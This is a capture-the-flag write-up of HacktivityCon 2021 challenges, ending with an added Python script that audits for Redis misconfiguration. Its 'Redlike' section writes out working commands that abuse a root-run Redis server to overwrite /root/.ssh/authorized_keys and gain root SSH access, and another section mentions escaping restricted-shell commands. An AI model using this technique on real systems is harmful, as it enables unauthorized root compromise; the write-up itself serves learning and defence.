I participated in the HacktivityCon 2021 CTF and solved a bunch of challenges which I am going to share.
Challenges
1. Jed Sheeran
Difficulty: medium
Category: OSINT
Description: Oh we have another fan with a budding music career! Jed Sheeran is seemingly trying to produce new songs based off of his number one favorite artist… but it doesn’t all sound so good. Can you find him?
Solution
I searched “Jed Sheeran” on Google and the first URL was a SoundCloud profile that belonged to a user called Jed Sheeran.
The user had posted a few songs, so I clicked on the first one and found the flag.
2. Mike Shallot
Difficulty: medium
Category: OSINT
Description: Mike Shallot is one shady fella. We are aware of him trying to share some specific intel, but hide it amongst the corners and crevices of internet. Can you find his secret?
Solution
Searching “Mike Shallot” on Google does not spill juicy info, so I opted to use a tool called sherlock, which is used to hunt down social media accounts by username.
The Pastebin account looks interesting. I decided to open it in a web browser and found this paste.
Mike’s profile picture is a Tor browser icon, thus the long string of random characters is a hidden website.
I added .onion at the end and opened it using Tor browser. On appending “pduplowzp/nndw79” to the URL, I got the flag.
3. Bad Words
Difficulty: easy
Category: Miscellaneous
Description:
I ran this command `nc challenge.ctf.games 31174` on my terminal and got a shell a few seconds later. I tried running some commands and most of them were restricted.
I then decided to escape the commands with a backslash “\” and …
That’s how I got the flag.
4. Redlike
Difficulty: medium
Category: Miscellaneous
Description:
Solution
I ssh’ed into the machine using the password given and got a shell.
I typed “sudo -l” and the response was
I decided to check the processes running as root which could be used to escalate privileges to root by entering this command: “ps axu”.
As you can see, there is a Redis server running as root, so I decided to research how I can use it to elevate my privileges and found that it can be used to write my public key to the “/root/.ssh/authorized_keys” file and gain root access through SSH.
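I entered these commands one by one:
```
# generate a key pair and pad the public key with blank lines
ssh-keygen -t rsa -b 2048
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > redis.txt
# store the padded public key under the Redis key "public"
cat redis.txt | redis-cli -h 127.0.0.1 -x set public
redis-cli -h 127.0.0.1
# the remaining lines are typed at the redis-cli prompt
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save
```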
I then elevated my privileges by SSHing in as the root user with `ssh -i ~/.ssh/id_rsa root@127.0.0.1`.
Here is the flag.
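
The Redlike escalation only works because Redis runs as root, accepts unauthenticated commands and allows `CONFIG SET` at runtime. The script below is an added example, not part of the original write-up, that audits `ps axu` output and a `redis.conf` for those three conditions; the sample inputs are constructed and the function names are hypothetical.

```python
import shlex

# Constructed sample inputs (not output from the challenge machine).
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   4632  1720 ?        Ss   10:00   0:00 /bin/sh /start.sh
root        12  0.1  0.4  52964  4100 ?        Ssl  10:00   0:01 redis-server 127.0.0.1:6379
user        40  0.0  0.2  18508  3400 pts/0    Ss   10:02   0:00 -bash
"""
WEAK_CONF = "bind 127.0.0.1\nport 6379\ndir /var/lib/redis\n"
HARDENED_CONF = WEAK_CONF + 'requirepass "constructed-placeholder"\nrename-command CONFIG ""\n'

def redis_users(ps_output):
    """Return the users owning a redis-server process in `ps axu` output."""
    users = set()
    for line in ps_output.splitlines()[1:]:      # skip the header row
        fields = line.split(None, 10)            # 11th field is the command line
        if len(fields) == 11 and "redis-server" in fields[10].split()[0]:
            users.add(fields[0])
    return users

def parse_conf(text):
    """Parse redis.conf text into (directive, [args]) pairs, directive lower-cased."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            parts = shlex.split(line)            # handles quoted arguments such as ""
            out.append((parts[0].lower(), parts[1:]))
    return out

def audit(ps_output, conf_text):
    """Return one finding per condition the key-overwrite technique depends on."""
    conf = parse_conf(conf_text)
    findings = []
    if "root" in redis_users(ps_output):
        findings.append("redis-server runs as root: files it saves are written as root")
    if not any(d == "requirepass" and a and a[0] for d, a in conf):
        findings.append("no requirepass: any local user can issue commands")
    config_locked = any(d == "rename-command" and len(a) == 2
                        and a[0].upper() == "CONFIG" for d, a in conf)
    if not config_locked:
        findings.append("CONFIG not renamed or disabled: dir/dbfilename can change at runtime")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_PS, WEAK_CONF):
        print("[!]", finding)
```

Running Redis under a dedicated unprivileged account removes the first finding, which is the one that turns a writable dump file into root access.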